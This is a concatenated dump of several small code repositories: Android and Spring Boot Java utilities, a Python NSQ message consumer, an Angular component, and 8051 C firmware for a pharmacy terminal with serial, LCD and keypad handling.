        return WindowManager.LayoutParams.TYPE_APPLICATION;
    }

    /**
     * Window width.
     */
    protected int getDefaultWidth() {
        return WindowManager.LayoutParams.WRAP_CONTENT;
    }

    /**
     * Window height.
     */
    protected int getDefaultHeight() {
        return WindowManager.LayoutParams.WRAP_CONTENT;
    }

    @Override
    public void onDismiss(DialogInterface dialog) {
        super.onDismiss(dialog);
        if (mDismissListener != null)
            mDismissListener.onDismiss(dialog);
    }

    @Override
    public void onCancel(DialogInterface dialog) {
        super.onCancel(dialog);
        // A cancel is reported through the same dismiss listener.
        if (mDismissListener != null)
            mDismissListener.onDismiss(dialog);
    }
}
<file_sep>package com.icenler.lib.feature.base;
import android.os.Bundle;
import android.support.annotation.LayoutRes;
import android.support.annotation.Nullable;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import com.icenler.lib.utils.LogUtil;
import java.util.List;
/**
 * Base fragment for ViewPager pages: caches the inflated root view and reconciles
 * Android's fragmented visibility signals (setUserVisibleHint(), onHiddenChanged(),
 * onResume()/onPause()) into consistent onVisible()/onInvisible() callbacks plus a
 * one-shot doLazyLoadData(). Visibility changes are also propagated to child
 * PagerFragments. The LogUtil.e(toString()) calls trace the lifecycle for debugging.
 */
public abstract class PagerFragment extends Fragment {

    protected View mRootView;

    /** Layout resource inflated once as this fragment's content view. */
    @LayoutRes
    protected abstract int doGetContentLayout();

    /** Called once, right after the root view is inflated; bind views here. */
    protected abstract void doInit(View root);

    /**
     * Normal (eager) load hook for ViewPager pre-loading; invoked from onActivityCreated().
     */
    protected void doLoadData() {
        LogUtil.e(toString());
    }

    /**
     * Lazy-load hook: invoked only the first time the fragment actually becomes visible.
     */
    protected void doLazyLoadData() {
        LogUtil.e(toString());
    }

    /**
     * Invoked when the fragment becomes truly visible
     * [combines onHiddenChanged() + onResume()/onPause() + setUserVisibleHint()].
     */
    protected void onVisible() {
        LogUtil.e(toString());
    }

    /**
     * Invoked when the fragment becomes truly invisible
     * [combines onHiddenChanged() + onResume()/onPause() + setUserVisibleHint()].
     */
    protected void onInvisible() {
        LogUtil.e(toString());
    }

    // True while the fragment is considered visible to the user.
    private boolean mIsSupportVisible;
    // When false, the next dispatch skips propagating to children (one-shot).
    private boolean mNeedDispatch = true;
    // Fragment was invisible when the host was left (paused).
    private boolean mInvisibleWhenLeave;
    // First real visibility triggers doLazyLoadData() exactly once.
    private boolean mIsFirstVisible = true;
    // Workaround for FragmentStatePagerAdapter calling setUserVisibleHint() before onResume().
    private boolean mFixStatePagerAdapter;

    @Override
    public void setUserVisibleHint(boolean isVisibleToUser) {
        super.setUserVisibleHint(isVisibleToUser);
        LogUtil.e(toString());
        if (isResumed()) {
            // Fragment is active: dispatch the visibility change immediately.
            if (!mIsSupportVisible && isVisibleToUser) {
                dispatchSupportVisible(true);
            } else if (mIsSupportVisible && !isVisibleToUser) {
                dispatchSupportVisible(false);
            }
        } else if (isVisibleToUser) {
            // Hint arrived before onResume(): remember it and dispatch later
            // from onActivityCreated()/onResume().
            mInvisibleWhenLeave = false;
            mFixStatePagerAdapter = true;
        }
    }

    @Override
    public void onHiddenChanged(boolean hidden) {
        super.onHiddenChanged(hidden);
        LogUtil.e(toString());
        if (isResumed()) {
            dispatchSupportVisible(!hidden);
        }
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        LogUtil.e(toString());
    }

    @Nullable
    @Override
    public View onCreateView(LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {
        LogUtil.e(toString());
        // Inflate only once; the cached root is reused on subsequent calls.
        if (mRootView == null) {
            mRootView = inflater.inflate(doGetContentLayout(), null);
            doInit(mRootView);
        }
        return mRootView;
    }

    @Override
    public void onActivityCreated(@Nullable Bundle savedInstanceState) {
        super.onActivityCreated(savedInstanceState);
        LogUtil.e(toString());
        doLoadData();
        // Dispatch a pending "visible" if the page is actually showing and the
        // parent (if any) is not hidden.
        if (!mInvisibleWhenLeave && !isHidden() && (getUserVisibleHint() || mFixStatePagerAdapter)) {
            if ((getParentFragment() != null && !getParentFragment().isHidden())
                    || getParentFragment() == null) {
                mNeedDispatch = false;
                dispatchSupportVisible(true);
            }
        }
    }

    @Override
    public void onStart() {
        super.onStart();
        LogUtil.e(toString());
    }

    @Override
    public void onResume() {
        super.onResume();
        LogUtil.e(toString());
        if (!mIsFirstVisible) {
            // Re-entering a previously visible page: restore the visible state.
            if (!mIsSupportVisible && !mInvisibleWhenLeave && !isHidden() && getUserVisibleHint()) {
                mNeedDispatch = false;
                dispatchSupportVisible(true);
            }
        }
    }

    @Override
    public void onPause() {
        super.onPause();
        LogUtil.e(toString());
        if (mIsSupportVisible && !isHidden() && getUserVisibleHint()) {
            mNeedDispatch = false;
            mInvisibleWhenLeave = false;
            dispatchSupportVisible(false);
        } else {
            mInvisibleWhenLeave = true;
        }
    }

    @Override
    public void onStop() {
        super.onStop();
        LogUtil.e(toString());
    }

    @Override
    public void onDestroyView() {
        super.onDestroyView();
        LogUtil.e(toString());
        // Reset so a re-created view lazy-loads again.
        mIsFirstVisible = true;
        mFixStatePagerAdapter = false;
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
        LogUtil.e(toString());
    }

    @Override
    public void onDetach() {
        super.onDetach();
        LogUtil.e(toString());
    }

    public View getRootView() {
        return mRootView;
    }

    public final boolean isSupportVisible() {
        return mIsSupportVisible;
    }

    // Records the new visibility, optionally propagates it to visible child
    // PagerFragments, then fires the onVisible()/onInvisible() hooks.
    private void dispatchSupportVisible(boolean visible) {
        mIsSupportVisible = visible;
        if (!mNeedDispatch) {
            // One-shot suppression set by the lifecycle callbacks above.
            mNeedDispatch = true;
        } else {
            FragmentManager fragmentManager = getChildFragmentManager();
            if (fragmentManager != null) {
                List<Fragment> childFragments = fragmentManager.getFragments();
                if (childFragments != null) {
                    for (Fragment child : childFragments) {
                        if (child instanceof PagerFragment && !child.isHidden() && child.getUserVisibleHint()) {
                            ((PagerFragment) child).dispatchSupportVisible(visible);
                        }
                    }
                }
            }
        }
        if (visible) {
            if (mIsFirstVisible) {
                mIsFirstVisible = false;
                doLazyLoadData();
            }
            onVisible();
        } else {
            onInvisible();
        }
    }
}
<file_sep>package com.icenler.lib.receiver.network;
import android.Manifest;
import android.content.Context;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.telephony.TelephonyManager;
import java.util.Locale;
/**
 * Created by iCenler - 2015/9/10.
 * Description: network type and carrier detection helpers.
 * <p/>
 * Requires {@link Manifest.permission#ACCESS_NETWORK_STATE}
 */
public class NetworkHelper {

    public static final int UNKNOWN = -1; // unknown / unrecognised carrier (comment fixed: was mislabelled)
    public static final int CMCC = 0;     // China Mobile
    public static final int CUCC = 1;     // China Unicom
    public static final int CTCC = 2;     // China Telecom

    /**
     * Carrier of the phone number: CMCC 0, CUCC 1, CTCC 2 (UNKNOWN until resolved).
     */
    public static int MOBILES_TYPE = UNKNOWN;

    private static final int NETWORK_TYPE_INVALID = -1;  // no network
    private static final int NETWORK_TYPE_ETHERNET = 0;  // wired
    private static final int NETWORK_TYPE_WIFI = 1;      // Wi-Fi
    private static final int NETWORK_TYPE_2G = 2;
    private static final int NETWORK_TYPE_3G = 3;
    private static final int NETWORK_TYPE_4G = 4;

    /**
     * @param context
     * @return whether any network is currently available
     */
    public static boolean isNetworkAvailable(Context context) {
        return getNetworkState(context) != NETWORK_TYPE_INVALID;
    }

    /**
     * @param context
     * @return current network state (one of the NETWORK_TYPE_* constants)
     */
    public static int getNetworkState(Context context) {
        int mNetworkType = NETWORK_TYPE_INVALID;
        ConnectivityManager connMgr = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
        NetworkInfo netInfo = connMgr.getActiveNetworkInfo();
        if (netInfo != null && netInfo.isAvailable()) {
            if (netInfo.getType() == ConnectivityManager.TYPE_ETHERNET) {
                // wired network
                mNetworkType = NETWORK_TYPE_ETHERNET;
            } else if (netInfo.getType() == ConnectivityManager.TYPE_WIFI) {
                // Wi-Fi network
                mNetworkType = NETWORK_TYPE_WIFI;
            } else if (netInfo.getType() == ConnectivityManager.TYPE_MOBILE) {
                // mobile network: classify as 2G/3G/4G
                mNetworkType = getMobileNetworkType(netInfo);
            }
        }
        return mNetworkType;
    }

    /**
     * @param netInfo active mobile network
     * @return 2G/3G/4G classification of the mobile subtype
     */
    private static int getMobileNetworkType(NetworkInfo netInfo) {
        // ((TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE)).getNetworkType();
        int networkType = netInfo.getSubtype();
        String networkName = netInfo.getSubtypeName();
        switch (networkType) {
            case TelephonyManager.NETWORK_TYPE_GPRS:
                //case TelephonyManager.NETWORK_TYPE_GSM:
            case TelephonyManager.NETWORK_TYPE_EDGE:
            case TelephonyManager.NETWORK_TYPE_CDMA:
            case TelephonyManager.NETWORK_TYPE_1xRTT:
            case TelephonyManager.NETWORK_TYPE_IDEN:
                return NETWORK_TYPE_2G;
            case TelephonyManager.NETWORK_TYPE_UMTS:
            case TelephonyManager.NETWORK_TYPE_EVDO_A:
            case TelephonyManager.NETWORK_TYPE_EVDO_B:
            case TelephonyManager.NETWORK_TYPE_EVDO_0:
            case TelephonyManager.NETWORK_TYPE_EHRPD:
            case TelephonyManager.NETWORK_TYPE_HSPA:
            case TelephonyManager.NETWORK_TYPE_HSDPA:
                //case TelephonyManager.NETWORK_TYPE_TD_SCDMA:
                return NETWORK_TYPE_3G;
            case TelephonyManager.NETWORK_TYPE_LTE:
                //case TelephonyManager.NETWORK_TYPE_IWLAN:
                return NETWORK_TYPE_4G;
            default:
                // Generation:    2G       3G        4G
                // China Mobile:  GSM      TD-SCDMA  TD-LTE
                // China Unicom:  GSM      WCDMA     TD-LTE / FDD-LTE
                // China Telecom: CDMA1X   CDMA2000  TD-LTE / FDD-LTE
                if (networkName.equalsIgnoreCase("TD-SCDMA") || networkName.equalsIgnoreCase("WCDMA") || networkName.equalsIgnoreCase("CDMA2000")) {
                    return NETWORK_TYPE_3G;
                } else if (networkName.equalsIgnoreCase("TD-LTE") || networkName.equalsIgnoreCase("FDD-LTE")) {
                    return NETWORK_TYPE_4G;
                } else {
                    return NETWORK_TYPE_2G;
                }
        }
    }

    /**
     * @param context
     * @return mobile service provider: CMCC, CUCC, CTCC, or UNKNOWN
     */
    public static int getServiceProvider(Context context) {
        TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
        String simOpt = telMgr.getSimOperator();
        if ("46000".equals(simOpt) || "46002".equals(simOpt)) {
            return CMCC; // China Mobile
        } else if ("46001".equals(simOpt)) {
            return CUCC; // China Unicom
        } else if ("46003".equals(simOpt)) {
            return CTCC; // China Telecom
        }
        return UNKNOWN; // consistency fix: use the named constant instead of a bare -1
    }

    public enum NetType {
        WIFI, CMNET, CMWAP, NONE
    }

    public static NetType getAPNType(Context context) {
        ConnectivityManager connMgr = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
        NetworkInfo networkInfo = connMgr.getActiveNetworkInfo();
        if (networkInfo == null) {
            return NetType.NONE;
        }
        int nType = networkInfo.getType();
        if (nType == ConnectivityManager.TYPE_MOBILE) {
            // Robustness fix: getExtraInfo() may return null (e.g. no APN set);
            // the original would NPE here. Treat null like a non-"cmnet" APN.
            String extraInfo = networkInfo.getExtraInfo();
            if (extraInfo != null && extraInfo.toLowerCase(
                    Locale.getDefault()).equals("cmnet")) {
                return NetType.CMNET;
            } else {
                return NetType.CMWAP;
            }
        } else if (nType == ConnectivityManager.TYPE_WIFI) {
            return NetType.WIFI;
        }
        return NetType.NONE;
    }
}
<file_sep>package com.icenler.lib.utils.helper;
import android.Manifest;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Build;
import android.provider.Settings;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentTransaction;
import com.icenler.lib.utils.manager.ToastManager;
import java.io.File;
/**
 * Created by iCenler - 2015/9/10.
 * Description: helpers for launching common system screens and intents.
 */
public class ActivityHelper {

    /**
     * Places a phone call. Requires CALL_PHONE; on API 23+ the permission must be
     * granted at runtime — this method silently returns when it is missing.
     *
     * @param phoneNum number to dial
     */
    public static void callPhone(Context context, String phoneNum) {
        Intent intent = new Intent(Intent.ACTION_CALL);
        intent.setData(Uri.parse("tel:" + phoneNum));
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            if (context.checkSelfPermission(Manifest.permission.CALL_PHONE) != PackageManager.PERMISSION_GRANTED) {
                // TODO: Consider calling
                // public void requestPermissions(@NonNull String[] permissions, int requestCode)
                // here to request the missing permissions, and then overriding
                // public void onRequestPermissionsResult(int requestCode, String[] permissions,
                // int[] grantResults)
                // to handle the case where the user grants the permission. See the documentation
                // for Activity#requestPermissions for more details.
                return;
            }
        }
        context.startActivity(intent);
    }

    /**
     * Opens this app's page in the Qihoo 360 app store so the user can rate it.
     * Shows a toast if that store app is not installed.
     */
    public static void goComment(Context context) {
        try {
            Intent intent = new Intent(Intent.ACTION_VIEW);
            ComponentName cn = new ComponentName("com.qihoo.appstore", "com.qihoo.appstore.activities.SearchDistributionActivity");
            intent.setComponent(cn);
            intent.setData(Uri.parse("market://details?id=" + context.getPackageName()));
            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            context.startActivity(intent);
        } catch (Exception e) {
            ToastManager.show(context, "您没有安装应用商城");
        }
    }

    /**
     * Shares plain text via the system share sheet.
     *
     * @param subject share subject line
     * @param content shared text body
     */
    public static void doShare(Context context, String subject, String content) {
        try {
            Intent intent = new Intent(Intent.ACTION_SEND);
            intent.setType("text/plain");
            intent.putExtra(Intent.EXTRA_SUBJECT, subject);
            intent.putExtra(Intent.EXTRA_TEXT, content);
            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            context.startActivity(intent);
        } catch (Exception e) {
            ToastManager.show(context, "无法分享内容");
        }
    }

    /**
     * Launches the system installer for the APK at the given path.
     * NOTE(review): declared private while every other helper is public — confirm
     * intended visibility. Also, Uri.fromFile() is rejected on API 24+ targets
     * (FileUriExposedException); a FileProvider URI would be needed there — verify.
     */
    private static void installApk(Context context, String path) {
        try {
            Intent intent = new Intent(Intent.ACTION_VIEW);
            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            intent.setDataAndType(Uri.fromFile(new File(path)), "application/vnd.android.package-archive");
            context.startActivity(intent);
        } catch (Exception e) {
            ToastManager.show(context, "安装文件不存在");
        }
    }

    /**
     * Asks the system to uninstall the app with the given package name.
     */
    public static void uninstallApk(Context context, String packageName) {
        Intent intent = new Intent(Intent.ACTION_DELETE);
        intent.setData(Uri.parse("package:" + packageName));
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent);
    }

    /**
     * Opens this app's "App info" screen in system settings.
     */
    public static void go(Context context) {
        Intent intent = new Intent(Settings.ACTION_APPLICATION_DETAILS_SETTINGS);
        intent.setData(Uri.parse("package:" + context.getPackageName()));
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent);
    }

    /**
     * Adds a fragment into the container with the given id.
     *
     * @throws NullPointerException if fragmentManager or fragment is null
     */
    public static void addFragmentToActivity(FragmentManager fragmentManager, Fragment fragment, int frameId) {
        if (fragmentManager == null || fragment == null)
            throw new NullPointerException();
        FragmentTransaction transaction = fragmentManager.beginTransaction();
        transaction.add(frameId, fragment);
        transaction.commit();
    }
}
<file_sep>package com.icenler.lib.common;
import com.android.volley.AuthFailureError;
import com.android.volley.Request;
import com.android.volley.toolbox.StringRequest;
import com.icenler.lib.feature.App;
import java.util.Map;
/**
 * Created by iCenler - 2015/10/28:
 * Description: thin wrappers around Volley {@link StringRequest} for GET/POST.
 * Any in-flight request with the same tag is cancelled before a new one is queued.
 */
public class VolleyRequest {

    // BUG FIX: the request is now a local variable. It was previously kept in a
    // shared static field that every call overwrote — unsafe with concurrent requests.

    public static void reqGet(String url, String tag, RequestCallback callback) {
        App.getHttpQueues().cancelAll(tag);
        StringRequest request = new StringRequest(Request.Method.GET, url,
                callback.successListener(), callback.errorListener());
        request.setTag(tag);
        App.getHttpQueues().add(request);
        App.getHttpQueues().start();
    }

    public static void reqPost(String url, String tag, final Map<String, String> params, RequestCallback callback) {
        App.getHttpQueues().cancelAll(tag);
        StringRequest request = new StringRequest(Request.Method.POST, url,
                callback.successListener(), callback.errorListener()) {
            @Override
            protected Map<String, String> getParams() throws AuthFailureError {
                // Form parameters supplied by the caller.
                return params;
            }
        };
        request.setTag(tag);
        App.getHttpQueues().add(request);
        App.getHttpQueues().start();
    }
}
| 55067e611157d09664591c72820ab6dcbad2e531 | [
"Markdown",
"Java",
"Text",
"Gradle"
] | 46 | Java | Cenler/AppDevLib | 70c48a5acea9a49a409c34de9f7e22b7f42850c3 | 13a71633152c769ee29bfae1d3f5651794f27c45 |
refs/heads/master | <repo_name>schnesim/SpringTest<file_sep>/src/main/java/de/allianz/test/logging/LogGetRequestInterceptor.java
package de.allianz.test.logging;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.web.servlet.DispatcherType;
import org.springframework.http.HttpMethod;
import org.springframework.stereotype.Component;
import org.springframework.web.servlet.HandlerInterceptor;
@Component
public class LogGetRequestInterceptor implements HandlerInterceptor {

    @Autowired
    private LoggingConfigurationBean logConfig;

    private Logger l = new Logger();

    /**
     * Logs every original (non-forwarded/non-included) GET request when REST
     * logging is enabled. Always returns true so processing continues.
     */
    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response,
            Object handler) {
        // Enum names are compared because the two DispatcherType enums come from
        // different packages (Spring Boot vs. the servlet API).
        boolean isOriginalRequest =
                DispatcherType.REQUEST.name().equals(request.getDispatcherType().name());
        boolean isGet = request.getMethod().equals(HttpMethod.GET.name());
        if (isOriginalRequest && isGet && logConfig.isRestLoggingEnabled()) {
            l.logRequest(request, null);
        }
        return true;
    }
}
<file_sep>/src/main/java/de/allianz/test/Endpoints.java
package de.allianz.test;
import de.allianz.test.model.JasonModel;
import de.allianz.test.model.Table2;
import de.allianz.test.model.Table1;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import java.util.UUID;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
@RestController
public class Endpoints {

    @Autowired
    private Table1Repository repo;

    /**
     * Creates a linked Table1/Table2 pair with a random crypt id and persists it.
     * NOTE(review): this mutates state from what is effectively a GET mapping;
     * consider switching to @PostMapping.
     */
    @RequestMapping("/save")
    public String doSomething() {
        Table1 t1 = new Table1();
        t1.setCryptId(UUID.randomUUID().toString());
        Table2 t2 = new Table2();
        t2.setFkCryptId(t1.getCryptId());
        t1.setTable2(t2);
        repo.save(t1);
        return "done";
    }

    /**
     * Accepts a JSON body and echoes a confirmation.
     * BUG FIX: the mapping previously used {@code name = "/post0r"}, which only
     * assigns a logical mapping name and leaves the URL path empty; {@code path}
     * is the attribute that binds the URL.
     */
    @PostMapping(path = "/post0r", consumes = {"application/json"})
    public String somePostEndpoint(@RequestBody JasonModel model) {
        System.out.println(model.getName());
        return "I did it";
    }
}
<file_sep>/src/main/java/de/allianz/test/endpoint/ToggleLogEndpoint.java
package de.allianz.test.endpoint;
import de.allianz.test.logging.LoggingConfigurationBean;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class ToggleLogEndpoint {

    @Autowired
    private LoggingConfigurationBean loggingConfiguration;

    public ToggleLogEndpoint() {
        // Debug trace retained from the original: confirms bean construction.
        System.out.println("ToggleLogEndpoint constructor");
    }

    /**
     * Flips the global REST-logging flag and reports the new state.
     * BUG FIX: the mapping previously used {@code name = "/toggleLog"}, which only
     * labels the mapping; {@code path} is the attribute that binds the URL.
     */
    @RequestMapping(path = "/toggleLog", method = {RequestMethod.GET})
    public String toggleSoapLog() {
        loggingConfiguration.setRestLoggingEnabled(!loggingConfiguration.isRestLoggingEnabled());
        return "rest log toggled to " + String.valueOf(loggingConfiguration.isRestLoggingEnabled());
    }
}
<file_sep>/src/main/java/de/allianz/test/logging/LoggingConfigurationBean.java
package de.allianz.test.logging;
import org.springframework.stereotype.Component;
@Component
public class LoggingConfigurationBean {

    // Global toggle consulted before logging REST traffic (e.g. by the GET-request
    // interceptor). Defaults to false until flipped via the toggle endpoint.
    private boolean restLoggingEnabled;

    public boolean isRestLoggingEnabled() {
        return restLoggingEnabled;
    }

    public void setRestLoggingEnabled(boolean restLoggingEnabled) {
        this.restLoggingEnabled = restLoggingEnabled;
    }
}
<file_sep>/src/main/java/de/allianz/test/H2Configuration.java
package de.allianz.test;
import de.allianz.test.logging.LoggableDispatcherServlet;
import org.h2.server.web.WebServlet;
import org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration;
import org.springframework.boot.web.servlet.ServletRegistrationBean;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.DispatcherServlet;
@Configuration
public class H2Configuration {

    /** Exposes the H2 web console under /console/*. */
    @Bean
    public ServletRegistrationBean h2servletRegistration() {
        ServletRegistrationBean registration = new ServletRegistrationBean(new WebServlet());
        registration.addUrlMappings("/console/*");
        return registration;
    }

    /** Registers the custom dispatcher servlet defined below. */
    @Bean
    public ServletRegistrationBean dispatcherRegistration() {
        DispatcherServlet servlet = dispatcherServlet();
        return new ServletRegistrationBean(servlet);
    }

    /** Replaces the default dispatcher with one capable of logging requests. */
    @Bean(name = DispatcherServletAutoConfiguration.DEFAULT_DISPATCHER_SERVLET_BEAN_NAME)
    public DispatcherServlet dispatcherServlet() {
        return new LoggableDispatcherServlet();
    }
}
<file_sep>/src/main/java/de/allianz/test/SpringTestApplication.java
package de.allianz.test;
import liquibase.integration.spring.SpringLiquibase;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import javax.sql.DataSource;
@SpringBootApplication
public class SpringTestApplication {

    @Autowired
    private DataSource dataSource;

    public static void main(String[] args) {
        // BUG FIX: pass the CLI arguments through so --spring.* property
        // overrides and profiles given on the command line take effect.
        SpringApplication.run(SpringTestApplication.class, args);
    }

    /**
     * Runs the Liquibase change log against the application data source at startup.
     */
    @Bean
    public SpringLiquibase liquibase() {
        SpringLiquibase liquibase = new SpringLiquibase();
        liquibase.setChangeLog("classpath:/db/changelog/liquibase-changeLog.xml");
        liquibase.setDataSource(dataSource);
        return liquibase;
    }
}
| 9c48f051a00f8bd8b5e26f0d8a576f10ff9ec4f8 | [
"Java"
] | 6 | Java | schnesim/SpringTest | 2a11fbded2a59f4205de6e856bc0bd3d81efcf43 | e7d90fc9405d85787198821d7b12934b9894d877 |
refs/heads/master | <file_sep>from json import JSONDecodeError
from marshmallow import Schema, fields
import nsq
class MessageSchema(Schema):
    """Expected shape of a consumed NSQ message: who travelled, from where, to where."""

    user = fields.Str()
    origin = fields.Str()
    destination = fields.Str()
# Module-level running counters (value -> number of times seen), updated once
# per successfully decoded message by handler().
ORIGIN = {}
DESTINATION = {}
USERS = {}
def occurrence(value, value_type):
if value in value_type.keys():
value_type[value] += 1
return value_type[value]
value_type[value] = 1
return 1
def handler(message):
schema = MessageSchema()
try:
result = schema.loads(message.body.decode())
occurrence(result['user'], USERS)
occurrence(result['destination'], DESTINATION)
occurrence(result['origin'], ORIGIN)
print(USERS)
print(DESTINATION)
print(ORIGIN)
return True
except JSONDecodeError:
return False
r = nsq.Reader(message_handler=handler, nsqd_tcp_addresses='127.0.0.1:4150',
topic='nsq_example', channel='chanel', lookupd_poll_interval=15)
if __name__ == '__main__':
nsq.run()
<file_sep>marshmallow==3.5.1
pynsq==0.8.3 | c8c49a37c4f8a88ee0052a58447c1e56de037543 | [
"Python",
"Text"
] | 2 | Python | dannycrief/pynsq_consumer | 89f0de75edc014d7ddf98845dedb0e95379b731c | 920b553c310625e3f8d5f0f9fc397bc3c1572359 |
refs/heads/master | <file_sep># FrontEndDevelopment_Directive_Assignment7.4-
Assignment 7.4 uploaded
<file_sep>import { Component } from '@angular/core';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
})
export class AppComponent {
color:string;
title = 'List Of Employees';
employees:any[]=[
{name:'abc',age:30},
{name:'cde',age:34},
{name:'fgh',age:34},
{name:'bmn',age:34}
];
}
| 002fe33201b5b3a96d23cf407f284817b3ae65e8 | [
"Markdown",
"TypeScript"
] | 2 | Markdown | gurpreet562/FrontEndDevelopment_Directive_Assignment7.4- | c722a8db14caa43cba4636c541cb12de83750da6 | 4fe3b7754a84fb4a487f5b2719ca0ed11b3df755 |
refs/heads/master | <file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial
#include <reg51.h>
void serial_com_config()
{
TMOD = 0x20;
TH1 = 0xFD; //19200 baud rate
SCON = 0x50; //mode 1
TR1 = 1; //timer1
}
void enviar_dado( char dado )
{
SBUF = dado; //transmissao de caractere via registro sbuf
while( TI == 0 ); //espera ate terminar transmissao
TI = 0; //clear TI flag
}
void enviar_palavra( char *palavra )
{
char i = 0;
while ( palavra[i] != 0 )
{
enviar_dado( palavra[i] );
i++;
}
}
char receber_dado()
{
while( RI == 0 ); //espera terminar recepcao do dado
RI = 0; //clear RI flag
return(SBUF); //recepcao do caractere via registro sbuf
}
char receber_palavra( char n )
{
char dados[20]; //ele nao aceita char_dados[n]
char i;
for( i=0; i<n; i++ )
{
dados[i] = receber_dado();
}
return(dados);
}
<file_sep>static void init_lcd();
static void cursor_lcd(char,char);
static void print_lcd(char*);
static char key_detect();
static void escrita_dado_lcd(char);
#define usr_digits 6
#define senha_digits 6
int i;
void usr_in(int *usr_id){
int usr_digits_in;
init_lcd();
cursor_lcd(0, 3);
print_lcd("Pharmicros");
cursor_lcd(1, 0);
print_lcd("Usr: ");
usr_digits_in = 0;
while(usr_digits_in<usr_digits){
char key = key_detect();
if(key != 0){
escrita_dado_lcd(key);
usr_id[usr_digits_in] = key;
usr_digits_in++;
}
}
}
void senha_in(int *usr_id, int *senha){
int senha_digits_in;
init_lcd();
cursor_lcd(0, 0);
print_lcd("Senha de ");
for(i=0;i<usr_digits;i++){
escrita_dado_lcd(usr_id[i]);
}
cursor_lcd(1, 3);
senha_digits_in = 0;
while(senha_digits_in<senha_digits){
char key = key_detect();
if(key != 0){
escrita_dado_lcd('*');
senha[senha_digits_in] = key;
senha_digits_in++;
}
}
}
void main()
{
int usr_id [usr_digits];
int senha [senha_digits];
usr_in(usr_id);
senha_in(usr_id,senha);
init_lcd();
cursor_lcd(0, 0);
print_lcd("usr:");
for(i=0;i<usr_digits;i++){
escrita_dado_lcd(usr_id[i]);
}
cursor_lcd(1, 0);
print_lcd("senha:");
for(i=0;i<senha_digits;i++){
escrita_dado_lcd(senha[i]);
}
while(1){
char key = key_detect();
if(key == '#'){
main();
}
}
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial - protocolo de recebimento
#include <reg51.h>
static void msg_travar_terminal();
static void msg_liberar_terminal();
static void msg_recebimento_horario();
static void msg_codigo_barra();
static char receber_dado();
static char receber_palavra( char n );
static void init_lcd();
static void print_lcd(char*);
static void data_horario( char, char, char, char );
static void main();
void protocolo_recebimento()
{
char dado1, dado2, dado3, dado4, dados;
char dia, mes, hora, min;
char n;
dado1 = receber_dado();
if ( dado1 == 'S' )
{
dado2 = receber_dado();
switch ( dado2 )
{
case 'T' : //travar terminal
msg_travar_terminal();
init_lcd();
print_lcd("FORA DE OPERACAO");
dado3 = receber_dado();
dado4 = receber_dado();
while ( dado3 != 'S' && dado4 != 'L' ) //liberar terminal
{
dado3 = receber_dado();
dado4 = receber_dado();
}
msg_liberar_terminal();
main();
break;
case 'L' : //liberar terminal
msg_liberar_terminal();
main();
break;
case 'H' : //date e horario
dia = receber_dado();
mes = receber_dado();
hora = receber_dado();
min = receber_dado();
data_horario( dia, mes, hora, min);
msg_recebimento_horario();
break;
case 'O' : //mensagem de resposta do servidor a entrada de operador
n = receber_dado();
dados = receber_palavra(n);
init_lcd();
print_lcd("dados");
//atraso_3s();
break;
case 'A' : //venda aberta
break;
case 'P' : //consulta de produto
n = receber_dado();
dados = receber_palavra(n);
break;
case 'C' : //comfirmação de venda
n = receber_dado();
dados = receber_palavra(n);
break;
case 'F' : //sessao de venda fechada
break;
case 'X' : //fechamento da sessao do operador
break;
case 'I' : //envio de impressao de comprovante
break;
}
}
else if ( dado1 == 'L' )
{
dado2 = receber_dado();
if ( dado2 == 'B' ) //codigo de barra
{
n = receber_dado();
dados = receber_palavra(n);
msg_codigo_barra();
//barcode_reader();
}
}
}<file_sep>//void atraso_60s()
//{
//fazer timer de 60s
//}
void data_horario( char dia, char mes, char hora, char min )
{
while( min < 60 )
{
//atraso_60s();
min++;
}
min = 0;
if ( hora < 24 )
{
hora++;
}
else
{
hora = 0;
if ( dia < 30 ) //teria q fazer um switch case para cada mes
{
dia++;
}
else
{
dia = 0;
if ( mes < 12 )
{
mes++;
}
else
{
mes = 0;
}
}
}
//botar variaveis em alguma porta, registrador
data_horario( dia, mes, hora, min );
}<file_sep># Pharmicros
